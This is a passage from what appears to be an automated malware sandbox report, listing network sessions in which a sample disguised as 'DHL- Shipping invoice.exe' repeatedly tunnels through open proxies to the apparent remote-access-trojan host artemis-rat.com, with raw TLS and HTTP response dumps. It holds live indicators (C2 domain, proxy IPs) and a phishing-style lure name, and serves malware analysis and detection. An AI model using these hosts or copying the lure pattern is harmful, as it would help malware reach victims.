                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:52.952939034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1318192.168.2.453947190.96.97.20241536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.738954067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1319192.168.2.453858128.199.196.31265796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.738955975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.453316927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.472045898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453536034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1320192.168.2.453838122.155.165.19131286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.739962101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.091360092 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1321192.168.2.452687186.156.161.23531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.739963055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.044192076 CET84INHTTP/1.0 200 Connection established
                            Proxy-agent: Kerio Control/9.2.3 build 2219


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1322192.168.2.45386547.106.112.20780816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.747715950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.076098919 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1323192.168.2.454003163.172.169.27163796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.751167059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.250113010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.766556978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.953464985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.062832117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.250163078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.359446049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.562578917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:25.749980927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1324192.168.2.45397444.226.167.102806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.753612041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.319603920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.496679068 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0
                            Mar 12, 2024 08:37:05.527904987 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 f0 06 20 2b b9 ac 36 38 f1 a5 ae 76 9f 4a 3a 85 03 7a 7d 1f 35 9b 8b c7 19 81 24 ff 9c f1 7e 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: lhe +68vJ:z}5$~*,+0/$#('=<5/artemis-rat.com#78ls-OuupD1'JN\X[k5XKLT3x;YN?
                            Mar 12, 2024 08:37:05.704767942 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 0c 2b 17 87 0f 35 e5 a0 93 8f be 56 c3 11 88 68 8a 56 3b 72 31 85 35 1b 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                            Data Ascii: =9+5VhV;r15DOWNGRD0000*H010Uartemis-rat.com0240312064409Z260312064409Z010Uartemis-rat.com0"0*H0_$`C
                            Mar 12, 2024 08:37:05.939882994 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 18 c7 ce ce ff 9f 2b 6a 02 54 53 0a 0f f6 ac d2 c8 88 b9 3e c5 1b 45 7e 32 f4 f9 a5 63 30 62 25 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 82 55 68 0c 98 f1 1e e3 77 90 4d 3f c3 bf 6b f1 84 0c 43 13 87
                            Data Ascii: %! +jTS>E~2c0b%(UhwM?kCSK3
                            Mar 12, 2024 08:37:06.115093946 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 27 95 e8 8c a9 3d 6b 08 4e 0c 1c 04 3e ed 44 0e a7 e6 16 ed ae 12 68 25 c3 6b 7f 7c b4 1e 74 5f 6b 3c 60 e3 96 b9 43 79
                            Data Ascii: ('=kN>Dh%k|t_k<`Cy


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1325192.168.2.454026164.92.86.113545976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.755368948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.250097036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.766011953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.765929937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1326192.168.2.454032128.199.5.6588886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.757031918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.942934036 CET132INHTTP/1.1 503 Too many open connections
                            Content-Type: text/plain
                            Connection: close
                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                            Data Ascii: Maximum number of open connections reached.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1327192.168.2.453812150.107.136.11080826484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.759239912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.140911102 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1328192.168.2.453881219.243.212.11884436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.763834000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.108974934 CET22INHTTP/1.1 502 ERROR


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1329192.168.2.45403577.68.100.177806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.903053045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.225272894 CET805INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:14 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 613
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1330192.168.2.453949177.12.118.160806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.903333902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1331192.168.2.45405137.187.91.192219816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.903404951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.452959061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.953546047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.008986950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.941626072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.950365067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.843954086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.602682114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.070414066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1332192.168.2.454097202.159.35.574436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.930028915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1333192.168.2.452313189.240.60.17190906484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.930792093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.285867929 CET72INHTTP/1.1 200 Connection established
                            Proxy-Agent: Fortinet-Proxy/1.0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1334192.168.2.453840103.83.252.6110806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.932171106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1335192.168.2.45360067.201.33.10252836484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.932941914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1336192.168.2.45408282.113.157.122312806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.936374903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
